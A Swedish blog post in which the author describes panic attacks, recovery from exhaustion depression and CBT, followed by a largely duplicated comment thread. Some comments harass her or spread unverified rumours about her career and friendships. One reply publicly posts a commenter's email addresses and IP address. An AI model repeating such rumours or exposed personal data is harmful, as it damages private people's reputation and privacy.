Panikångest, ångest och reflektion!

475A0349

Att stanna upp, vara i nuet och andas 🙏🏻

Det ser ju vackert och fridfullt ut. Men för mig, jätte svårt! Mina tankar forceras, jag planerar redan flera saker parallellt, och är allt annat än i nuet. Detta är en av Veckans övning för mig själv……. 🙏🏻☺️ Behandlingen pågår, 2 gånger i veckan hos doktor. Men den svåra utmaningen är att ta med mig verktygen hem, och lära mig att hantera dom ☺️

Ett steg i taget. Jag får jobba med att bromsa mig själv. Jag har alltid bråttom, vill framåt. Så fort jag har lite energi så tar jag full fart. Jag har alltid kunnat jobba på med 200%. När jag var tonåring ersatte man mig mot två anställda. Detta vet under en period då jag var severtris. Jag kunde både ta serveringen, beställningarna och disken. Jag blev stolt, kände mig duktig. FUCK vad fel. Med facit i hand så är det så jag alltid gjort, jobbat på ett nästintill omänskligt sätt. Byggde upp My’s Blommor, pendlade till Amsterdam och underbara Holland i tio år. Byggde upp grossistverksamheten, öppnade en butik till. Flög fram och tillbaka, bilade ibland. Samma sak där, stressade och forcerade när jag satte rekord tid på att köra ner på 9.5h genom Sverige, Danmark, Tyskland och tillsut kom fram i Alsmeer.  (Söder om amterdam). Jag har alltid haft full fart framåt. Det BEHÖVER inte vara något dåligt. Men om man som jag gjorde kombinerar det med stress, sorg och HELT glömde bort återhämtningen. Slavrade med mat och sömn. Tappade bort mig själv…….. Då slår det tillbaka. Det gjorde det också. Tänk att jag nu är 30 år sedan i vintras. Min son är 7 år. FÖRST NU, lyssnar jag på kroppen. Först nu tar jag emot professionell hjälp. Först NU inser jag hur tokigt jag levt under många år. 

Läskigt. Men också befriande 

I min väg tillbaka från min utmattningsdepression så får jag en behandling där jag jobbar enormt mycket med mig själv….. Kontrollerar ångest, övervinner rädslor, lär känna mig själv. Reflekterar….. lyssnar och lär ❤️  Det är inte enkelt. Att träffa doktor och kbt är med blandade känslor. Jobbigt och skönt. Jag har pendlat mellan hopp och förtvivlan. Ifrågasatt vad som är fel på mig. Varför fungerar jag inte längre. För bara två veckor sedan ringde jag Jonas. jag föll ihop på gatan och fick en blackout. Tappade minnet för en stund. Kunde bara inte komma ihåg vilket garage eller i vilken statsdel som jag parkerat bilen. Det gick inte. Hur mycket jag än ansträngde mig så kunde jag inte plocka upp dessa bilder hur jag kört in i stan. Så läskigt! Jag fick (såklart) en panikågestattack, tårarna sprutade, kramp, andnöd och yrsel. Jag tappade kontrollen och fick hjälp av en tiggare och några vakter. Pinsamt.

Denna händelse skrymde mig. För nu när jag mår så mycket bättre vill jag inte backa så långt. Men min doktor förklarar för mig att det gör ingenting. För det är fortfarande framsteg jag gör. Bakslag är helt okay, och jag hanterar dom bättre och bättre.

För övrigt tycker jag att jag börjar bli något av en specialist på att hantera just panikångesten. (inte vanlig molande ångest som ligger latent, utan panikattackerna. ) För mig slår det till på antingen, jag får svårt att andas och blir yr. Första gången trodde jag att jag skulle dö. Ambulans och drama deluxe. Men nu, nu känner jag av tecknen innan, jag undviker vissa situationer där jag märker att det framkallas, jag andas bättre, jag parerar dom bättre.  När jag sa det till doktorn, att jag börjar bli specialist. Då skrattade han på ett mjukt sätt…. och sa:

”Nä My, du övervinner dina rädslor, du kontrollerar din känslor mycket bättre bär du inte blir lika skräckslagen. Bra jobbat” 

Det där har jag funderat på…. Hur allt hänger ihop. Känslor, tankar, beteende. I vilken ordning. Hur det ena kan slå ut det andra. Ja… mycket händer inom mig. Jag är så tacksam över saker som jag tidigare tog för givet. Jag har accepterat läget och tar ett steg i taget. 

 

Alla ska må så bra hela tiden, enligt 90% av vad sociala medier visar. Bullshit! Ingen är perfekt, och det är helt okt att inte alltid må så bra…. ❤️ Glöm inte det. Det är så lätt att döma någon. Se på mig, hur ifrågasatt har jag blivit här inne. Extremt!

Oavsett vem du möter eller vart du möter någon. Alla har ett bagage, alla bär på någonting. Med ett litet extra leende kan du förändra någons dag.

-Tänkvärt!  Nu ska jag samma ihop mig, ställa mig i solen på gatan här nedanför. Sitter på kontoret just nu. Berättar mer om just kontoret vid ett senare tillfälle. Sabina (Poddkollegan) kommer strax. Men är lite sen  pga av trafiken. Så jag ska ta me mig min kaffekopp, ställa mig i solen och andas.

Öva på min övning som för mig är JÄTTE svår! Stor kram, tack för att DU finns! /

My Martens 

207 Komentarer

 1. Ryser av det du berättar. Been there done that. Sista vändan blev jag inlagd på psyk och det var det bästa som kunde ha hänt mig. Där fick jag möta personer som hamnat i svåra psykoser, en del livslånga, pga stress och det skrämde mig rejält. Det blev mitt wakeup call och jag är så tacksam för den insikten! Nu planerar jag helt annorlunda och även om jag ibland bokar in för mycket jobb så är jag ändå medveten om det och kan backa.. Det är INTE värt det att leka duktig flicka! Det är så himla bra att du berättar för det kan hjälpa många andra att få insikt och veta att man absolut inte är ensam..
  var rädd om dig ❤️ Kram
  Ps: var är de snygga träningskläderna ifrån? (Det svarta med blommor)

 2. Du skriver så bra, tänk vad lite man vet om andra…var alltid snäll och ödmjuk och lämna en positiv kommentar så ofta du kan- det gör vem som helst glad?❤Du är grym, låt ingen säga annat?Ha en fin helg!

 3. Ryser av det du berättar. Been there done that. Sista vändan blev jag inlagd på psyk och det var det bästa som kunde ha hänt mig. Där fick jag möta personer som hamnat i svåra psykoser, en del livslånga, pga stress och det skrämde mig rejält. Det blev mitt wakeup call och jag är så tacksam för den insikten! Nu planerar jag helt annorlunda och även om jag ibland bokar in för mycket jobb så är jag ändå medveten om det och kan backa.. Det är INTE värt det att leka duktig flicka! Det är så himla bra att du berättar för det kan hjälpa många andra att få insikt och veta att man absolut inte är ensam..
  var rädd om dig ❤️ Kram

  Ps: var är de snygga träningskläderna ifrån? (Det svarta med blommor)

 4. Du skriver så bra, tänk vad lite man vet om andra…var alltid snäll och ödmjuk och lämna en positiv kommentar så ofta du kan- det gör vem som helst glad🌞❤Du är grym, låt ingen säga annat🌿Ha en fin helg!

 5. Du flänger och far mellan jobb, mingel, pod och jag vet inte vad. Ingen människa orkar leva så i längden. Försök att tagga ner och bara vara, du behöver inte flänga runt med powewalks kl 05 på morgonen. Ta det lugnare och koppla av vännen. Försök leva ett ”vanligt” liv- Du är bara 30 år och har livet framför dig. Tänk på det så att du orkar.
  Stor kram o ha det så bra

 6. Behovet av bekräftelse är alltid stort o har man haft en trasslig barndom o uppväxt blir det än större. Då längtar vi o jagar efter det tills vi får det. Men när vi får det blir längtan än större för då förstår vi o får kontakt med saknaden o bristen inom oss. Det kanske är en förklaring till ditt tidigare hektiska liv, den ständiga kampen. Nu med mera insikt så tror jag du kämpar för att ta vara på det du har o den kärlek o bekräftelse som du får från dina nära. Men jag tror du får träna dig i att minska jakten o att våga stanna upp o andas. Inte alldeles enkelt med det jobb o uppdrag som du håller på med. Lycka till, med tålamod o terapi når du säkert långt❤️

 7. Du flänger och far mellan jobb, mingel, pod och jag vet inte vad. Ingen människa orkar leva så i längden. Försök att tagga ner och bara vara, du behöver inte flänga runt med powewalks kl 05 på morgonen. Ta det lugnare och koppla av vännen. Försök leva ett ”vanligt” liv- Du är bara 30 år och har livet framför dig. Tänk på det så att du orkar.

  Stor kram o ha det så bra

 8. Behovet av bekräftelse är alltid stort o har man haft en trasslig barndom o uppväxt blir det än större. Då längtar vi o jagar efter det tills vi får det. Men när vi får det blir längtan än större för då förstår vi o får kontakt med saknaden o bristen inom oss. Det kanske är en förklaring till ditt tidigare hektiska liv, den ständiga kampen. Nu med mera insikt så tror jag du kämpar för att ta vara på det du har o den kärlek o bekräftelse som du får från dina nära. Men jag tror du får träna dig i att minska jakten o att våga stanna upp o andas. Inte alldeles enkelt med det jobb o uppdrag som du håller på med. Lycka till, med tålamod o terapi når du säkert långt❤️

 9. Hävdar fortfarande att är man/har varit utmattad så lever man inte som du gör.
  Far runt som en skottspole..

 10. Om du slutar älta och fokuserar på din återhämtning går det nog betydligt bättre.
  Lev i nuet. Det gör du inte. Bara här på bloggen återkommer du alltsom oftast till hur du hade det förr. Vet inte hur många gånger du ältar din gamla blombutik. Släpp det nån gång. Du låter det ta alldeles för stor plats. Se till vad du har nu. Älta heller inte dina misslyckanden som PT och att du inte fick fortsätta mäklarutbildningen. Här o nu o blicka framåt. Du behöver inge sätta ord på ditt misslyckande med blomaffären i bloggen. Sånt blir mer verkligt o tar mer kraft o energi då. Låt det passera i din tanke. Hörde av en vän som känner Jonas och jag är ledsen att säga det men även han påpekar att du lever i det förflutna, ältar o ältar. Han tycker det är jobbigt då det inget finns att göra åt. Lyft blicken och sparka sönder backspegeln. Tips från vän till J.

  • Fast vaddå misslyckanden som PT och fick inte fortsätta mäklarutbildningen? Som jag förstått det ville inte My jobba som PT, tror hon är en lysande sådan så det är inget misslyckande. Och mäklarutbildningen har hon ju flera ggr svarat att går bra och hon fortfarande går, så det där har du nog helt fått om bakfoten.

   • Nej. PT jobbet hon hade fick hon lov att sluta. Mäklarutbildningen likaså. Hon kuggade tentor o prov och fick inte fortsätta. Så någon mäjlarutbildning går hon inte längre. Vet detta då jag har vänner i bla Jonas kretsar o även andra med insyn i hennes liv. Varför dessa personer berättat som det är beror på att dom tröttnat på hennes hyckleri o lögner. Och detta beteende går långt tillbaka i tiden. Dom har ledsnat på henne. Och så har ju självklart det hon gjorde Maggan Graaf betydelse. Samt att flera andra bloggare tagit avstånd. Hennes vänkrets är liten. Och även vissa av dessa har valt att yppa sanningen bakom henne. Sorry men så är läget.

    • Okej men hur lysande är NI så som jobbar inom kommunen eller är anställda…med alla era avtal osv.??? Håll käften för faa..an. Ni vet ingenting hur livet kan se ut för oss som jobbar ihjäl oss för ER och ser till att det finns lön och skattepengar så NI har ett jobb att gå till, sjukersättning, semesterersättning, föräldrapenning och helgdagar att ta del av. Åh vad fick vi kvinnliga företagare? Hmm..ja en jävla massa skit av KVINNOR att VI är dåliga på alla sätt å vis å att vi skall vara både kvinna å man å vara hemma ta hand om barnen men det är heller inte ok för det är ju inte feministiskt… balansera upp med att byta däck å allt en karl kan, ja då är vi hemma. .. Vad gör då mannen?… rullar tummarna, korsord, knullar någon annan?? Kör motorcykel, fotboll, broderar???

     • Härligt Mia! Bra rytet! Allting hänger ihop… anställda, företagare osv. Alla egenföretagare sliter som djur. Men jämförs oftast med något helt annat. Det driv och det som sporrar oss av olika anledningar är ingenting någon som inte varit egenförtagare förstår, och det är just ”dom” som ofta gör denna felaktiga bedömning… =) Jaja… shake it of! Kram

     • Allvarligt My?! Håller du med en som klankar ner på kommunalanställda? Har inte du en son som går i skolan? Om inte människor ville arbeta inom kommun och landsting vad tror ni händer då?! Den läkare du träffar My? Det sociala stöd, medicinska stöd och ekonomiska stöd människor får: tror ni att endast ni egenföretagare bidrar till det?! Knappast!! Jag arbetar med utsatta ungdomar inomsocialrjänsten och betalar också skatt. Fy fan vilken unken människosyn och framförallt KVINNOSYN att ha. Se utanför er egen bubbla och var tacksam för de som tar hand om människor. Ingen är bättre än någon annan. Men just nu känner jag att du My, som hyllar denna kommentar, blev sämre…

     • Nej nej leoni. Jag klankar ner på den felbedömningen som många ofta gör mot egenföretagare, speciellt kvinnor. Man trycker gärna ner oss i både tid och otid. Jag klankar ner på det beteendet. Vi alla behöver varandra. Systemet behöver varandra. Jag tycker att man ska sträva efter att jobba med det som man själv brinner för. Det man själv mår bra av. Jag har flertal gånger innan skrivit om bla hur lågavlönade våra förskolelärare och hemtjänsten är. hur fel jag tycker att det är. Att de människorna som tar hand om våra egna barn, eller de som tar hand om den äldre generationen som grundat för oss. Hur dom får så mycket både mindre betalt och mindre resurser än vad dom både förtjänar och skulle behöva. Så Leoni, lägg gärna inte en åsikt som jag inte står för i mitt knä… Ha en fin kväll =)

     • Fast My, om du läser Miss kommentar en gång till… Som du hejar på. Så går den kommentaren emot allt som du skriver till mig! Det är inte jag som lägger en åsikt i ditt knä. Det är Mias skeva åsikt som du öppet stöttar vilket jag ifrågasatte. Läs igen.

     • Mia,
      Ser du världen så svart och vit?
      Blev faktiskt ledsen av ditt inlägg.
      Jag vet att många egenföretagare jobbar väldigt väldigt mycket. Har vänner som både lyckats fantastiskt bra och andra inte så bra. Men det finns även andra som sliter de också i olika anställningsformer. Allt har sina för och nackdelar. Men att säga att det bara är egenföretagare som gör att vi har en välfärd är väl ändå helt snett. Vilka människor handlar varor/tjänster av privata företag? Är det alla eller är det bara en speciell grupp? Tänk att det även är pensionärer, arbetslösa och sjuka som också köper saker så företag kan gå runt. De allra flesta betalar skatt här i Sverige för att hjälpas åt tillsammans. Dessutom kan en och samma person ha eget företag, vara kommunalanställd, vara sjukskriven och bli pensionär i olika faser av sitt liv!
      Alla behövs! Hur skulle det se ut i samhället om alla var egna företagare?
      Lite mer ödmjuk för andra människor skulle vara klädsamt.

     • Doris, är det då inte orättvist att vi företagare inte får ta del av alla förmåner som ni kommunalanställda får ta del av? Vi betalar också skatt, möjligen ännu mer utan att få ta del av det ni får. Jag har tex inte tagit ut en enda föräldradag eller vad det nu heter, skall då inte de pengarna gå till mina barn i någon annan form? Som företagare jobbar man dygnet runt om man måste. Har ansvar för anställda så de har en lön osv. Jag kan då inte bara gå hem för att vabba, ta helg eller vara ledig på alla helgdagar eller för den delen ta en klämdag. Jag tycker du borde vara ödmjuk mot mig om jag skall vara det mot dig. Okej men jag får väl skylla mig själv som valde att skapa något för er andra. Så här är det utan oss hade du inte ett jobb att gå till vare sig du vill eller inte. Skulle tyvärr säga att vi företagare är dagen svenska slavar (huadåminsjäl nu blev det ju rasistiskt oxå.. ve å fasa) Jo med den enorma arbetsbelastningen, ansvaret, de fruktansvärda höga skatterna och inte tala om arbetsgivaravgiften för att få hjälp är helt otroligt i detta land. Vem har sagt att ni inte behövs, det ligger i din tolkning inte i min. Tycker bara att man skall vara tacksam för oss också, vi sliter som djur dygnet runt men aldrig får någon som helst uppskattning. Tro faa–an att man går in i väggen, utmattningssyndrom m.m men mycket beror på er andra, det är dags för er att förstå att vi inte lever i ett industrisamhälle längre, vi företagare följer all lagar och regler när det gäller anställda såsom las, semesterersättning, lönehöjningar och gör vårat bästa alla dagar i veckan för alla, men vad fick vi??
      ……………………………………………
      !!! Ps Du tolkar texten som du vill utifrån dina egna upplevelser och det är svårt att förklara något för den som inte vill förstå eller inte har erfarenheten.

     • Det blir bara värre och värre Mia… Vilken offerkoffa du stickat till dig själv!
      Och nu menar du alltså att samhället ska kompensera dina barn ekonomiskt för att du VALDE att arbeta istället för att vara föräldraledig?! Tillåt mig gapskratta åt dubbelmoralen. Jag antar att någon annan var med dina barn då du inte var det? Jag känner många mammor med egna företag som varit föräldralediga både en och tre gånger… Du tycker att dina ungar ska få statliga bidrag som plåster för såren för att deras mamma valde att dra in pengar till statskassan (åt oss stackars kommunalanställda star dom minsann inte bidrar ett skit) istället för att få pengar av att vara med dom?
      Ang helger och röda dagar så undrar jag hur du tror att vård etc går runt då om alla är lediga som du påstår? Totalt verklighetsfrånvänd. Och denna människa hejar du på My?

     • Valde vad då, hmm.. kan alla välja vad man skall bli? Vissa måste bara dra in pengar i familjen, vilket lyxliv lever du i detta så kallade bidragssamhälle? Jag jobbade och tog hand om barnen samtidigt (bar dem i en sjal på ryggen du vet) Snacka om att vara nervärderande.. och offerkofta (typ DU/NI stackare). Jag klarar mig förträffligt utan dig men skall mina barn behöva lida för jag hamnade i detta yrke? Varför nervärderar du då mig och inte mannen som är egenföretagare? Vård för vem? Vissa utvalda? Det finns ingen vård i Sverige längre i vilket land bor du i? Någon fantasivärld? Vad händer med skolan? Tycker du våra pensionärer har det bra? Vart tog tjänstemannaansvaret vägen?
      Ja just det som sagt om du kan läsa var ovanstående text min åsikt och ingen annans men tydligen vet vissa författare bättre…
      “Never argue with stupid people, they will drag you down to their level and then beat you with experience.”
      ― Mark Twain
      Tack och hej fröken frej!

     • Vet du, jag har inte nämnt män överhuvudtaget i denna fråga. Men när du kallar mig dum för att jag inte håller med så tar diskussionen slut. Bara en stilla undran: du som ser ner på kommun- och landstingsanställda men samtidigt hävdar att du själv inte valt ditt yrke. Gäller den regeln bara dig eller alla? Jag har pluggat över 5 år på universitet och valt mitt yrke, tjänar inte multum men för mig är det inte det viktigaste! Är jag sämre än dig då, som inte arbetar för mig själv och (i din värld) inte bidrar med lika mycket skatt?
      Ja, jag tycker att din syn är skev! Men att du kallar mig korkad säger faktiskt mer om dig än om mig.
      Och du. Du vet faktiskt ingenting om mig eller min familj. Jag arbetar kommunalt och var föräldraledig i 10 månader. Min man driver eget företag (med 10 anställda) och även han var föräldraledig lika länge. Så snälla, låt inte dina åsikter om ensamföretagare stå för alla i branchen. Du väljer hur du ser på saken men din attityd mot andra människor är allt annat än trevlig.

     • Mia,
      Först vill jag säga att jag verkligen tycker att många entreprenörer och egna företagare gör ett fantastiskt jobb!
      Det får du inte tro att jag inte tycker.
      Har vänner och släkt som är eller har varit egna företagare.
      Men även andra som jobbar som anställda eller inte kan jobba alls pga sjukdom.
      Ska vi ställa dessa mot varandra?
      Varför?
      Vem är mest betydelsefull eller gör mest eller är mest….
      Är det så vi ska se på livet och medmänniskor?
      Företag är mycket viktiga, men vad är många företag utan sina anställda?
      Alla behövs! Om vi jobbar med och inte mot varandra så blir samhället bättre.
      Jag tycker det är väldigt tråkigt att du inte känner dig uppskattad för allt du gör.
      Jag hoppas iallafall du jobbar med något du tycker är roligt, ger mening på något sätt.
      Känner att du gör någonting bra åtminstone för dig själv eller andra.
      Men jag har svårt att tro att du valde att bli egen företagare bara för andras skull.
      Tycker du ser lite obalanserat på helheten bara.Vem vet vad någon annan kommer betyda för någon i framtiden?
      Och ju svartare tankar man har desto mörkare blir ens glasögon man ser livet igenom.
      Och det är det bara du själv som mår dåligt av.

    • Vad gjorde hon mot Maggan? Kan någon snälla berätta vad som egentligen hände?! Så många rykten och spekulationer… Kan du berätta?

     • My kommer nog aldrig att berätta pga allvaret i det hon gjort o gjorde. Maggan kommer inte att berätta officiellt. Hennes vänner vet…..

 11. Hävdar fortfarande att är man/har varit utmattad så lever man inte som du gör.
  Far runt som en skottspole..

 12. Om du slutar älta och fokuserar på din återhämtning går det nog betydligt bättre.
  Lev i nuet. Det gör du inte. Bara här på bloggen återkommer du alltsom oftast till hur du hade det förr. Vet inte hur många gånger du ältar din gamla blombutik. Släpp det nån gång. Du låter det ta alldeles för stor plats. Se till vad du har nu. Älta heller inte dina misslyckanden som PT och att du inte fick fortsätta mäklarutbildningen. Här o nu o blicka framåt. Du behöver inge sätta ord på ditt misslyckande med blomaffären i bloggen. Sånt blir mer verkligt o tar mer kraft o energi då. Låt det passera i din tanke. Hörde av en vän som känner Jonas och jag är ledsen att säga det men även han påpekar att du lever i det förflutna, ältar o ältar. Han tycker det är jobbigt då det inget finns att göra åt. Lyft blicken och sparka sönder backspegeln. Tips från vän till J.

  • Fast vaddå misslyckanden som PT och fick inte fortsätta mäklarutbildningen? Som jag förstått det ville inte My jobba som PT, tror hon är en lysande sådan så det är inget misslyckande. Och mäklarutbildningen har hon ju flera ggr svarat att går bra och hon fortfarande går, så det där har du nog helt fått om bakfoten.

   • Nej. PT jobbet hon hade fick hon lov att sluta. Mäklarutbildningen likaså. Hon kuggade tentor o prov och fick inte fortsätta. Så någon mäjlarutbildning går hon inte längre. Vet detta då jag har vänner i bla Jonas kretsar o även andra med insyn i hennes liv. Varför dessa personer berättat som det är beror på att dom tröttnat på hennes hyckleri o lögner. Och detta beteende går långt tillbaka i tiden. Dom har ledsnat på henne. Och så har ju självklart det hon gjorde Maggan Graaf betydelse. Samt att flera andra bloggare tagit avstånd. Hennes vänkrets är liten. Och även vissa av dessa har valt att yppa sanningen bakom henne. Sorry men så är läget.

    • Okej men hur lysande är NI så som jobbar inom kommunen eller är anställda…med alla era avtal osv.??? Håll käften för faa..an. Ni vet ingenting hur livet kan se ut för oss som jobbar ihjäl oss för ER och ser till att det finns lön och skattepengar så NI har ett jobb att gå till, sjukersättning, semesterersättning, föräldrapenning och helgdagar att ta del av. Åh vad fick vi kvinnliga företagare? Hmm..ja en jävla massa skit av KVINNOR att VI är dåliga på alla sätt å vis å att vi skall vara både kvinna å man å vara hemma ta hand om barnen men det är heller inte ok för det är ju inte feministiskt… balansera upp med att byta däck å allt en karl kan, ja då är vi hemma. .. Vad gör då mannen?… rullar tummarna, korsord, knullar någon annan?? Kör motorcykel, fotboll, broderar???

     • Härligt Mia! Bra rytet! Allting hänger ihop… anställda, företagare osv. Alla egenföretagare sliter som djur. Men jämförs oftast med något helt annat. Det driv och det som sporrar oss av olika anledningar är ingenting någon som inte varit egenförtagare förstår, och det är just ”dom” som ofta gör denna felaktiga bedömning… =) Jaja… shake it of! Kram

     • Allvarligt My?! Håller du med en som klankar ner på kommunalanställda? Har inte du en son som går i skolan? Om inte människor ville arbeta inom kommun och landsting vad tror ni händer då?! Den läkare du träffar My? Det sociala stöd, medicinska stöd och ekonomiska stöd människor får: tror ni att endast ni egenföretagare bidrar till det?! Knappast!! Jag arbetar med utsatta ungdomar inomsocialrjänsten och betalar också skatt. Fy fan vilken unken människosyn och framförallt KVINNOSYN att ha. Se utanför er egen bubbla och var tacksam för de som tar hand om människor. Ingen är bättre än någon annan. Men just nu känner jag att du My, som hyllar denna kommentar, blev sämre…

     • Nej nej leoni. Jag klankar ner på den felbedömningen som många ofta gör mot egenföretagare, speciellt kvinnor. Man trycker gärna ner oss i både tid och otid. Jag klankar ner på det beteendet. Vi alla behöver varandra. Systemet behöver varandra. Jag tycker att man ska sträva efter att jobba med det som man själv brinner för. Det man själv mår bra av. Jag har flertal gånger innan skrivit om bla hur lågavlönade våra förskolelärare och hemtjänsten är. hur fel jag tycker att det är. Att de människorna som tar hand om våra egna barn, eller de som tar hand om den äldre generationen som grundat för oss. Hur dom får så mycket både mindre betalt och mindre resurser än vad dom både förtjänar och skulle behöva. Så Leoni, lägg gärna inte en åsikt som jag inte står för i mitt knä… Ha en fin kväll =)

     • Fast My, om du läser Miss kommentar en gång till… Som du hejar på. Så går den kommentaren emot allt som du skriver till mig! Det är inte jag som lägger en åsikt i ditt knä. Det är Mias skeva åsikt som du öppet stöttar vilket jag ifrågasatte. Läs igen.

     • Mia,

      Ser du världen så svart och vit?
      Blev faktiskt ledsen av ditt inlägg.
      Jag vet att många egenföretagare jobbar väldigt väldigt mycket. Har vänner som både lyckats fantastiskt bra och andra inte så bra. Men det finns även andra som sliter de också i olika anställningsformer. Allt har sina för och nackdelar. Men att säga att det bara är egenföretagare som gör att vi har en välfärd är väl ändå helt snett. Vilka människor handlar varor/tjänster av privata företag? Är det alla eller är det bara en speciell grupp? Tänk att det även är pensionärer, arbetslösa och sjuka som också köper saker så företag kan gå runt. De allra flesta betalar skatt här i Sverige för att hjälpas åt tillsammans. Dessutom kan en och samma person ha eget företag, vara kommunalanställd, vara sjukskriven och bli pensionär i olika faser av sitt liv!
      Alla behövs! Hur skulle det se ut i samhället om alla var egna företagare?
      Lite mer ödmjuk för andra människor skulle vara klädsamt.

     • Doris, är det då inte orättvist att vi företagare inte får ta del av alla förmåner som ni kommunalanställda får ta del av? Vi betalar också skatt, möjligen ännu mer utan att få ta del av det ni får. Jag har tex inte tagit ut en enda föräldradag eller vad det nu heter, skall då inte de pengarna gå till mina barn i någon annan form? Som företagare jobbar man dygnet runt om man måste. Har ansvar för anställda så de har en lön osv. Jag kan då inte bara gå hem för att vabba, ta helg eller vara ledig på alla helgdagar eller för den delen ta en klämdag. Jag tycker du borde vara ödmjuk mot mig om jag skall vara det mot dig. Okej men jag får väl skylla mig själv som valde att skapa något för er andra. Så här är det utan oss hade du inte ett jobb att gå till vare sig du vill eller inte. Skulle tyvärr säga att vi företagare är dagen svenska slavar (huadåminsjäl nu blev det ju rasistiskt oxå.. ve å fasa) Jo med den enorma arbetsbelastningen, ansvaret, de fruktansvärda höga skatterna och inte tala om arbetsgivaravgiften för att få hjälp är helt otroligt i detta land. Vem har sagt att ni inte behövs, det ligger i din tolkning inte i min. Tycker bara att man skall vara tacksam för oss också, vi sliter som djur dygnet runt men aldrig får någon som helst uppskattning. Tro faa–an att man går in i väggen, utmattningssyndrom m.m men mycket beror på er andra, det är dags för er att förstå att vi inte lever i ett industrisamhälle längre, vi företagare följer all lagar och regler när det gäller anställda såsom las, semesterersättning, lönehöjningar och gör vårat bästa alla dagar i veckan för alla, men vad fick vi??
      ……………………………………………
      !!! Ps Du tolkar texten som du vill utifrån dina egna upplevelser och det är svårt att förklara något för den som inte vill förstå eller inte har erfarenheten.

     • Det blir bara värre och värre Mia… Vilken offerkoffa du stickat till dig själv!
      Och nu menar du alltså att samhället ska kompensera dina barn ekonomiskt för att du VALDE att arbeta istället för att vara föräldraledig?! Tillåt mig gapskratta åt dubbelmoralen. Jag antar att någon annan var med dina barn då du inte var det? Jag känner många mammor med egna företag som varit föräldralediga både en och tre gånger… Du tycker att dina ungar ska få statliga bidrag som plåster för såren för att deras mamma valde att dra in pengar till statskassan (åt oss stackars kommunalanställda star dom minsann inte bidrar ett skit) istället för att få pengar av att vara med dom?
      Ang helger och röda dagar så undrar jag hur du tror att vård etc går runt då om alla är lediga som du påstår? Totalt verklighetsfrånvänd. Och denna människa hejar du på My?

     • Valde vad då, hmm.. kan alla välja vad man skall bli? Vissa måste bara dra in pengar i familjen, vilket lyxliv lever du i detta så kallade bidragssamhälle? Jag jobbade och tog hand om barnen samtidigt (bar dem i en sjal på ryggen du vet) Snacka om att vara nervärderande.. och offerkofta (typ DU/NI stackare). Jag klarar mig förträffligt utan dig men skall mina barn behöva lida för jag hamnade i detta yrke? Varför nervärderar du då mig och inte mannen som är egenföretagare? Vård för vem? Vissa utvalda? Det finns ingen vård i Sverige längre i vilket land bor du i? Någon fantasivärld? Vad händer med skolan? Tycker du våra pensionärer har det bra? Vart tog tjänstemannaansvaret vägen?
      Ja just det som sagt om du kan läsa var ovanstående text min åsikt och ingen annans men tydligen vet vissa författare bättre…
      “Never argue with stupid people, they will drag you down to their level and then beat you with experience.”

      ― Mark Twain
      Tack och hej fröken frej!

     • Vet du, jag har inte nämnt män överhuvudtaget i denna fråga. Men när du kallar mig dum för att jag inte håller med så tar diskussionen slut. Bara en stilla undran: du som ser ner på kommun- och landstingsanställda men samtidigt hävdar att du själv inte valt ditt yrke. Gäller den regeln bara dig eller alla? Jag har pluggat över 5 år på universitet och valt mitt yrke, tjänar inte multum men för mig är det inte det viktigaste! Är jag sämre än dig då, som inte arbetar för mig själv och (i din värld) inte bidrar med lika mycket skatt?
      Ja, jag tycker att din syn är skev! Men att du kallar mig korkad säger faktiskt mer om dig än om mig.
      Och du. Du vet faktiskt ingenting om mig eller min familj. Jag arbetar kommunalt och var föräldraledig i 10 månader. Min man driver eget företag (med 10 anställda) och även han var föräldraledig lika länge. Så snälla, låt inte dina åsikter om ensamföretagare stå för alla i branchen. Du väljer hur du ser på saken men din attityd mot andra människor är allt annat än trevlig.

     • Mia,

      Först vill jag säga att jag verkligen tycker att många entreprenörer och egna företagare gör ett fantastiskt jobb!
      Det får du inte tro att jag inte tycker.
      Har vänner och släkt som är eller har varit egna företagare.
      Men även andra som jobbar som anställda eller inte kan jobba alls pga sjukdom.
      Ska vi ställa dessa mot varandra?
      Varför?
      Vem är mest betydelsefull eller gör mest eller är mest….
      Är det så vi ska se på livet och medmänniskor?
      Företag är mycket viktiga, men vad är många företag utan sina anställda?
      Alla behövs! Om vi jobbar med och inte mot varandra så blir samhället bättre.
      Jag tycker det är väldigt tråkigt att du inte känner dig uppskattad för allt du gör.
      Jag hoppas iallafall du jobbar med något du tycker är roligt, ger mening på något sätt.
      Känner att du gör någonting bra åtminstone för dig själv eller andra.
      Men jag har svårt att tro att du valde att bli egen företagare bara för andras skull.
      Tycker du ser lite obalanserat på helheten bara.Vem vet vad någon annan kommer betyda för någon i framtiden?
      Och ju svartare tankar man har desto mörkare blir ens glasögon man ser livet igenom.
      Och det är det bara du själv som mår dåligt av.

    • Vad gjorde hon mot Maggan? Kan någon snälla berätta vad som egentligen hände?! Så många rykten och spekulationer… Kan du berätta?

     • My kommer nog aldrig att berätta pga allvaret i det hon gjort o gjorde. Maggan kommer inte att berätta officiellt. Hennes vänner vet…..

 13. Varför håller du på att gör dig märkvärdig om du nu mår så dåligt. Det första rådet är att tagga ner och bete dig som den problem person du är. Du är inte och kommer aldrig att bli bättre än någon annan. Sorry.

  • Dina kommentarer här inne nu under kvällen!Och du verkar må bra och så? :
   Anonym
   kaj@yahoo.com
   62.119.166.1
   Postat 2018-05-09 kl. 19:18
   Varför håller du på att gör dig märkvärdig om du nu mår så dåligt. Det första rådet är att tagga ner och bete dig som den problem person du är. Du är inte och kommer aldrig att bli bättre än någon annan. Sorry.
   Välj kommentar Anonym
   kaj@uahoo.com
   62.119.166.1
   Postat 2018-05-09 kl. 19:24
   Nu får ta och berätta hur det ligger till med alla dina misslyckanden och inte försöka att verka flashigare och lyxigare än du är. Försk inte framstå som bättre, vackrare och rökare än någon annan för det är du inte.
   Anonym
   nkaj@Yahoo.com
   62.119.166.1
   Postat 2018-05-09 kl. 20:07
   Äcklig mat och sunkig bambarestaurang du gör reklam för. Knappast någon smalmat. Fick du sparken som PT?

 14. Nu får ta och berätta hur det ligger till med alla dina misslyckanden och inte försöka att verka flashigare och lyxigare än du är. Försk inte framstå som bättre, vackrare och rökare än någon annan för det är du inte.

 15. Tittar in och vet Du vad jag lämnar till Dig My?
  – En stor Kram och ett Lycka till och Du har verktygen för att allt skall gå Dig väl i händer!
  Du har kärleken i lillpojken och storpojken! Trevlig helg!

